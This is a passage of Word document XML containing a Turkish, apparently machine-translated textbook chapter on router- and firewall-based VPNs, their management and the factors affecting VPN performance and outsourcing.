        <w:t xml:space="preserve">Bir VPN dağıtımı için düşük maliyetli bir giriş noktası, VPN işlevselliğine sahip mevcut yönlendiricileri kullanmaktır. Tarafından mevcut ağ kaynaklarından yararlanma, uygulama maliyetleri düşürülebilir ve ağa entegrasyon yönetim altyapısı daha kolay bir şekilde gerçekleştirilebilir. Bugün birçok yönlendirici VPN protokolünü ve daha yeni yönlendiriciler VPN trafiğini daha verimli bir şekilde işlemek için geliştirilmiştir. Ancak, bir yönlendiricinin birincil işlevi ağ paketlerini bir ağdan diğer bir ağa yönlendirmek; bu nedenle, yönlendirme performansı ve VPN işlevselliği arasında takas kararı verilmesi gerekebilir. Bazı yönlendirici modelleri, ek VPN işleme yeteneği eklemek için donanım yükseltmelerini destekler. Mevcut yönlendiricileri yükseltme yeteneği, VPN kullanıcı topluluğu büyüdükçe bir geçiş yolu sağlar. Birçok yönlendirici tabanlı VPN, dijital desteği içerir sertifikalar. Bazı durumlarda, dijital sertifikaların metin dosyalarının kesilmesi ve yapıştırılması yoluyla manuel olarak talep edilmesi ve edinilmesi gerekir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00550F84">
        <w:t>VPN düğümlerinin sayısına bağlı olarak, bu ölçeklenebilirliği etkileyebilir. VPN özellikli yönlendiriciler, güçlü güvenlik yönetimi araçları gerektirir - normalde donanım aracı ve yazılım VPN'leriyle birlikte verilen aynı tür araçlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Yönlendirici tabanlı VPN tüneli nerede sonlandırılmalıdır? Tünel iki yerden birinde sonlandırılabilir: Bir erişim yönlendiricisine VPN eklerken veya arkadaki tünel trafiğini sonlandırırken şebeke çevresinin dışında Bir iç yönlendiriciye VPN eklerken güvenlik duvarı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550F84">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Güvenlik Duvarı Tabanlı VPN'ler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00550F84">
        <w:t>Güvenlik duvarları, bir ağa giren trafikle ilgili kararlara izin vermek / reddetmek için tasarlanmıştır. Birçok şirket zaten ağlarının çevresinde güvenlik duvarı uygulamaktadır. Birçok güvenlik duvarının VPN uç noktaları olarak kullanılmak üzere yükseltilmesi özelliği vardır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00550F84">
        <w:t>Bu durumda, bazı kuruluşlar için mevcut güvenlik duvarlarının VPN yeteneklerini araştırmak mantıklı olabilir. Bu, önceden oluşabilecek maliyetleri azaltmak için mevcut ağ altyapısından yararlanmanın bir başka örneğidir. Güvenlik duvarlarını VPN uç noktası olarak kullanmayla ilgili bir endişe performans olacaktır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bir ağa giren veya çıkan tüm trafik bir güvenlik duvarından geçtiğinden, güvenlik duvarı zaten aşırı yüklenmiş olabilir. Ancak bazı güvenlik duvarı satıcıları donanım şifreleme eklentileri sunar. Herhangi bir yapılandırılabilir güvenlik cihazında olduğu gibi, herhangi bir Güvenlik duvarında yapılan değişiklikler güvenliğini tehlikeye atabilir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00550F84">
        <w:t>VPN yönetimi, güvenlik duvarı tarafından sağlanan ortak bir yönetim arayüzü kullanılarak geliştirilmiştir. Çevre güvenlik duvarı olarak bu, VPN için ideal bir konumdur, çünkü girişi / çıkışı tek bir noktaya ayırır. VPN sunucusunu güvenlik duvarına eklemek, donanım, yazılım ve yönlendirici VPN'lerle ilişkili yerleşim sorunlarını ortadan kaldırır; örneğin, şifreli paketler güvenlik duvarındaki bir delikten geçirilmelidir, güvenlik duvarı NAT vb. yaparsa ne olur?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Güvenlik duvarı / VPN yaklaşımı ayrıca güvenlik duvarındaki VPN tünellerinin sonlandırılmasına, şifre çözme ve verilerin denetlenmesine izin verir. Bu kabiliyetin avantajlı olduğu bir senaryo, güvenlik duvarı tabanlı anti-virüs yazılımının VPN tünelinden geçen verilere karşı çalıştırılması gerektiğidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550F84">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Herhangi bir VPN için Genel Yönetim Sorunları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Yazılım tabanlı VPN'i kimin yönetmesi gerektiği sorusu ortaya çıkıyor. Yönetim arasında bölünebilir bir ağ işlemleri grubu, bir güvenlik grubu ve veri sahibi. Ağ işlemlerinin yapılması gerekecek uygulama ve tasarım kararları almaya dahil, çünkü bu grup genellikle bir şirketin veri ve veri bütünlüğünün kullanılabilirliğini korumakla yükümlüdür. </w:t>
      </w:r>
      <w:r w:rsidRPr="00550F84">
        <w:t>Güvenlik grubunun, güvenlik politikasına uygunluğu sağlamak için genel sistem tasarımını ve kabiliyetini analiz etmesi gerekir. Veri sahibi, bu durumda, erişimi sınırlamak için VPN kullanan operasyonel gruba atıfta bulunur. Veri sahibi, erişim kontrolü ve kullanıcı hesabı kurulumundan sorumlu olabilir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>İdeal bir durumda, bu işbölümü VPN operasyonlarına dağıtılmış bir yönetim yaklaşımı sağlayacaktır. Uygulamada, bu yaklaşımın pratik olması için gereken işbirliği düzeyi nadiren görülür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00227E4E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00227E4E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VPN Performansını Değerlendirme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bu noktada, VPN’leri son kullanıcı ve yönetici bakış açılarından değerlendirme kriterlerini tartıştık. Ancak, VPN satıcılarının bir pazarlama aracı olarak performans için nasıl bir ölçüt oluşturduklarını anlamak da anlayışlıdır. </w:t>
      </w:r>
      <w:r w:rsidRPr="00227E4E">
        <w:t>Pek çok satıcı, eşzamanlı VPN bağlantısı sayısına, maksimum oturum sayısına veya verime göre sınıflandırdıkları VPN ürünleri sunar. Çoğu güvenlik uzmanı uygulamanın ne kadar güvenli olduğu ile ilgilenmektedir; çoğu ağ operasyon personeli, özellikle ISS personeli, kaç müşteri veya uzak kullanıcı tünelinin bir VPN ağ geçidi tarafından desteklenmesiyle ilgilenmektedir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bir IPSec uzak kullanıcı tüneli olabilir. IKE faz 1 ve faz 2 anahtar değişimlerinin tamamlanması olarak tanımlanır. Bu aşamalar tamamlanmalı Her uzak iletişim oturumu için güvenli bir tünel oluşturarak dört güvenlik birliği sağlayın. Bu öznel bir tanım çünkü satıcılar tipik olarak performans iddialarını mümkün olan en iyi ışığa sokmak için çeşitli tanımlar oluştururlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Birçok satıcı VPN verimini karakterize etmek için tek bir numara vermesine rağmen, gerçek dünya dağıtımlarında, performans birçok koşullara bağlı olarak değişecektir. Bu bölüm, gerçek dünya dağıtımlarındaki verimi etkileyen faktörlerin bir özetini sunar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00227E4E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Paket Boyutu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Veri şifreleme ve kimlik doğrulama gibi çoğu VPN işlemi paket başına gerçekleştirilir. İşlemci ek yük büyük ölçüde paket büyüklüğünden bağımsızdır. Bu nedenle, daha büyük paket boyutları genellikle daha yüksek verilere yol açar verim rakamları. İnternetteki ortalama IP paket büyüklüğü yaklaşık 300 bayttır. Ne yazık ki, çoğu satıcı, nispeten büyük ortalama 1000 baytlık paket boyutlarına dayanan VPN işlem hacmi özelliklerini belirtir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1005B">
        <w:t xml:space="preserve"> Sonuç olarak, kuruluşlar, satıcılardan beklenen performansı daha iyi ölçmek için bir dizi ortalama paket boyutunun üzerinde verim spesifikasyonları istemelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00227E4E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00227E4E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Şifreleme ve Kimlik Doğrulama Algoritmaları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Daha güçlü şifreleme algoritmaları, matematik işlemlerini tamamlamak için daha büyük sistem kaynakları gerektirir, bu da daha düşük veri akışı sağlar. Örneğin, DES (56 bit güçlü) şifrelemeye dayalı VPN çıkışı, 3DES (168 bit güçlü) şifrelemeye göre daha büyük olabilir. Akış şifreleri tipik olarak blok şifrelere göre daha hızlıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Veri kimlik doğrulama algoritmaları veri çıkışı üzerinde benzer bir etkiye sahip olabilir. Örneğin, MD5 kullanarak kimlik doğrulaması, SHA1 ile karşılaştırıldığında biraz daha büyük bir verime neden olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00227E4E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ana CPU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Yazılım tabanlı VPN çözümleri, müşterilere sınıf ve saate göre değişen çeşitli merkezi işlemciler sunar. hız. Ana bilgisayar işleme gücü, isteğe bağlı donanım tabanlı bir seçenek sunmayan VPN ürünleriyle özellikle önemlidir hızlanma. VPN testi, VPN sunucularına ek genel amaçlı CPU'lar eklenerek performansın doğrusal olarak artmadığını göstermiştir. </w:t>
      </w:r>
      <w:r w:rsidRPr="004E7A60">
        <w:t xml:space="preserve">Bir satıcı, bir Windows NT sunucusunda, bir işlemci yüzde 100 yüklüyse, ikinci bir işlemci eklenmesinin CPU kaynaklarını yalnızca yüzde 5 serbest bıraktığını iddia ediyor. Satıcı, sunucuya genel amaçlı CPU'lar eklemek yerine şifreleme hızlandırma donanımı kullanırken, verimde yedi kat artış olduğunu iddia ediyor. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Diğer durumlarda, genel amaçlı CPU'ların eklenmesi, donanım ivmesi eklenmesine kıyasla fiyat / performans esasına göre daha ağır basar. Bir durumda, genel amaçlı CPU eklemenin maliyeti donanım hızlandırma kartının fiyatının yaklaşık iki katı, esasen daha az performans artışıyla. Hız sadece bir CPU faktörü değil, aynı zamanda </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>bir G / Ç veri yolu, RAM ve önbellek faktörüdür. Azaltılmış Komut Seti İşlemciler, RISC işlemcileri, genel amaçlı işlemcilerden daha hızlıdır ve Uygulamaya Özel Tümleşik Devreler, ASIC'ler genellikle yapmak için tasarlandıkları işlerde RISC işlemcilerinden daha hızlıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A60">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>İşletim Sistemi ve Yama Seviyeleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Pek çok yazılım tabanlı VPN çözümü, müşterilere ticari işletim sistemi seçenekleri sunar. İşletim sistemlerinden elmadan elmaya karşılaştırmaların zor olmasına rağmen, müşteriler performans karşılaştırma ölçütlerinin hedef işletim sistemlerine özgü olduğundan emin olmalıdır.  Ayrıca, işletim sistemi düzeltme eki düzeylerinin de önemli bir verimlilik etkisi olabilir. Genellikle, en güncel işletim sistemi düzeltme eki düzeyleri daha iyi performans sağlar. VPN gereksinimi işletim sistemi tabanlı VPN teknolojisini kullanmaksa, çoğu yazılım güvenlik duvarında olduğu gibi işletim sistemlerinin gerekli "sertleşmesini" sağlayan yazılım ürünlerini göz önünde bulundurun. Yazılım güncellemeleri, güvenlik uyarıları ve yama güncellemeleri sunan devam eden servis planlarına abone olmayı düşünün.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004E7A60" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A60">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ağ Arabirim Kartı Sürücüleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ağ arabirim kartı (NIC) sürüm seviyeleri verimi etkileyebilir. Genellikle, en güncel ağ arayüzü kart sürücüleri en iyi performansı sunuyor. Birkaç ağ arabirim kartı üreticisi şimdi IPSec tabanlı VPN'lere tamamlayıcı işlevler gerçekleştiren ürünler sunuyor. NIC'ler kullanıcı bilgisayarlarına veya şifreleme / şifre çözme gerçekleştiren IPSec VPN ağ geçitlerine kurulabilir, böylece CPU kullanımını azaltma.  Bu işlem, doğrudan NIC'ye bir işlemci kurmak suretiyle gerçekleştirilir; bu, NIC'nin daha fazla ağ trafiği işleme yükünü paylaşmasını sağlar; böylece ana bilgisayar sistemi, hizmet uygulamalarına odaklanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A60">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hafıza</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004E7A60">
        <w:t>Bir VPN'nin uzaktaki bir kullanıcı tüneli bazında ölçeklendirilebilmesi, ağ geçidi sunucusunda kurulu olan sistem belleği miktarına bağlıdır. Pek çok VPN cihazı çözümünden farklı olarak (sabit miktarda bellekle sınırlıdır), yazılım tabanlı bir VPN, eşzamanlı bağlantıları ve uzak kullanıcı tünellerini, çekirdeğin oluşturduğu maksimum eşzamanlı bağlantıları destekl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eyerek sınırlandırır. Bazı </w:t>
      </w:r>
      <w:r w:rsidRPr="004E7A60">
        <w:t>durumlarda, eşzamanlı bağlantılar, ana bilgisayarın çekirdek sınırlarından bağımsız olan VPN uygulaması proxy bağlantı sınırları ile sınırlıdır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E7A60">
        <w:t>Bununla birlikte, çoğu VPN dağıtımının, bağlantı sınırlamalarına ulaşmadan önce verimlilik sınırlamaları ile karşılaşabileceğini anlamak önemlidir. Yalnızca yazılım tabanlı VPN platformlarının bellek genişletilebilirliğini ve özel donanımın verimlilik avantajlarını birleştirerek her iki dünyanın da en iyisini elde edebilirsiniz.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Aşağıdaki varsayımsal örneği ele alalım. Bir kuruluşta, donanım hızlandırıcılığının yüklü olduğu yazılım tabanlı bir VPN'e bağlı 30 Mbps İnternet bağlantısı vardır. Bu kuruluş için, tek bir uzak kullanıcı için gerekli ortalama veri hızı yaklaşık olarak 40K'dır. Bu senaryoda, VPN yaklaşık 750 eşzamanlı uzak kullanıcıyı destekleyecektir (30 MB / 40K). </w:t>
      </w:r>
      <w:r w:rsidRPr="004E7A60">
        <w:t>Kullanıcı sayısı 750 kullanıcının ötesine geçtiğinde, ortalama veri oranları ve ilgili kullanıcı deneyimi düşmeye başlayacaktır. Bu örnekten, güvenilir, eşzamanlı kullanıcı desteğinin, kurulan bağlantı sayısındaki sınırlamalardan ziyade, yazılım-tabanlı VPN ağ geçidi verimi tarafından sınırlandırılmasının daha muhtemel olduğu açıktır. Bu açıdan bakıldığında, şifreleme hızlandırıcı kartı, binlerce kullanıcıyı desteklemek için yazılım tabanlı bir VPN dağıtımını ölçeklendirmede önemli bir etkendir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004E7A60">
        <w:t>Tek bir sayı, VPN'in performans performansını etkili bir şekilde tanımlamaz. Örneğin, sistem tarafından aktarılan paketlerin büyüklüğü verimlilik üzerinde önemli bir etkiye sahiptir. Sistem performansı daha küçük paket boyutlarıyla azalır. Paket boyutu ne kadar küçük olursa, saniyede işlenen paket sayısı da o kadar fazla olur, ek yük de o kadar yüksek olur ve bu nedenle de etkili verim düşer.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bir şifreleme hızlandırıcı kart olabilir Performansın tüm paket boyutları için optimize edilmesini sağlamak için hem büyük hem de küçük paketler için ayarlanmıştır. Performansı etkileyebilecek diğer </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>faktörler arasında sistem yapılandırması (CPU, bellek, önbellek vb.), Şifreleme algoritmaları, kimlik doğrulama algoritmaları, işletim sistemi ve trafik türleri. Bu faktörlerin çoğu tüm VPN ürünleri için geçerlidir. Bu nedenle, rekabetçi VPN ürünlerinin performans özelliklerinin, bu sayıların tüm ortamlarda doğrudan karşılaştırılabileceği veya elde edilebileceği anlamına geldiğini varsaymayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004E7A60" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A60">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Veri Sıkıştırma Yardımları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t xml:space="preserve">Performansı artırmak ve son kullanıcılar arasındaki memnuniyeti artırmak için ulaşılması gereken bir amaç, gecikmeyi en aza indirmektir. VPN’de Gecikmeyi en aza indirmenin bir yolu daha az trafik göndermektir. </w:t>
      </w:r>
      <w:r w:rsidRPr="004E7A60">
        <w:t>Bu amaç, verileri VPN'ye koymadan önce sıkıştırarak başarılabilir. Sıkıştırmadan elde edilen performans kazancı, ne tür veri gönderildiğine bağlı olarak değişir; Ancak, genel olarak, veriler bir kez şifrelenmişse, şifrelenmemiş olduğu gibi sıkıştırılmaz. Veri sıkıştırma, özellikle düşük bant genişliğine sahip analog çevirmeli VPN erişimini optimize ederken, MTU boyutu ve parçalanmanın faktör olabileceği durumlarda, önemli bir performans arttırıcıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C421B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ham Performans En Önemli Kriterler mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="006C421B">
        <w:t>Amacı, kullanıcıların hangi özellikleri VPN'leri değerlendirmede en önemli olduğunu düşündüklerini ve gelecekteki tekliflerde görmek istediklerini keşfetmek olan bir VPN kullanıcısı anketine göre, performans VPN'leri değerlendirirken öncelikli olarak güvenlikten daha yüksek olarak değerlendirildi. Bu, çok az kişinin VPN teknolojisinin güvenliğine ikna olduğu VPN'in ilk günlerinden düşünmede bir kaymaya işaret ediyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bu özellikle VPN teknolojilerine ve ürünlerine aşinalıklarını “yüksek” olarak değerlendiren güvenlik profesyonelleri için geçerlidir. VPN’leri anlayanlar güvenlik ürünlerine güven duyuyorlar ve bunun farkındalar. performans ve yönetim sonraki büyük savaşlar. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C421B">
        <w:t>Anket sonuçlarına göre, birçok kullanıcı, temel güvenlik bileşenleri bir endişe kaynağı olsa da, VPN performansından ödün verilmemesi gerektiğini düşünüyor. Ankete göre, kullanıcılar performans, uygulama güvenliği ve kullanılabilirlik gibi üst düzey özellikler hakkında daha fazla endişe duyuyor ve VPN'in altında yatan teknolojiler ve protokoller hakkında daha az endişe duyuyorlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C421B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VPN'yi Dış Kaynak Kullanımı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="006C421B">
        <w:t>Bilgili bir servis sağlayıcıya yapılan dış kaynak kullanımı, sorun giderme için bir uzmana sahip olmanın getirdiği bir güvenlik duygusu sunabilir. Dış kaynak kullanımı, şirket içi güvenlik yöneticilerini, şube ofisleri ağa eklenmesi gereken uzak kullanıcıları kurup test ederken VPN'lerini fiziksel olarak yükseltme ile ilgili sorunlardan kurtarır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C421B">
        <w:t>Bir şirket coğrafi olarak dağınık bir omurgasına sahip olmadıkça, en azından VPN'in transit kısmının bir İnternet erişim servis sağlayıcısı veya özel IP ağ sağlayıcısı tarafından dış kaynaklı olması gerekir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C421B">
        <w:t>Ancak, genel bir İnternet erişim hesabı, VPN trafiğinin yoğun saatlerde İnternet'teki trafiğin geri kalanıyla engellenmeyeceğinin güvencesini sağlamamaktadır. ISS veya VPN servis sağlayıcısı, gerekli donanım ve yazılımı seçip kurabilir, ayrıca teknik destek ve devam eden bakım görevlerini üstlenebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Ek 40.7, bir VPN servis sağlayıcısını değerlendirirken göz önünde bulundurulması gereken bazı faktörleri listeler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C421B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Güvenilirlik</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006C421B">
        <w:t xml:space="preserve">Kullanıcılar ağa bağlanamıyorsa ve verimli bir bağlantı kuramıyorsa, güvenlik önemsizdir. VPN'nin hedefi mobil çalışanlara uzaktan erişim sağlamaksa, performansın kilit bir yönü, hizmet sağlayıcının ihtiyaç duyacağı coğrafi bölgelerde sahip olacağı nokta sayısı olacaktır. servisin yanı sıra, servis sağlayıcının çevirmeli bağlantı erişimindeki başarı oranları bakımından yapabileceği garantileri de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C421B">
        <w:lastRenderedPageBreak/>
        <w:t>içerir.  Örneğin, bir VPN servis sağlayıcısı (ulaşım ve güvenlik hizmetleri sağlar), zamanın yüzde 99'u 26,4 KBps veya daha yüksek ilk modem bağlantı hızı ile yüzde 97 oranında meşgul arama veya uzaktan erişim sunar. Başka bir VPN servis sağlayıcısı (ulaşım ve güvenlik hizmetleri sağlar),% 100 ağ kullanılabilirliğini ve çevirmeli bağlantı hizmeti için yüzde 95 bağlantı başarı oranını desteklemektedir. Bu garantiler karşılanmadığında, servis sağlayıcı tipik olarak bir tür finansal tazminat veya hizmet kredisi vaat eder. VPN taşıma ve güvenlik hizmetleri bağımsız olarak dış kaynaklı olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006C421B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ek 40.7</w:t>
      </w:r>
      <w:r>
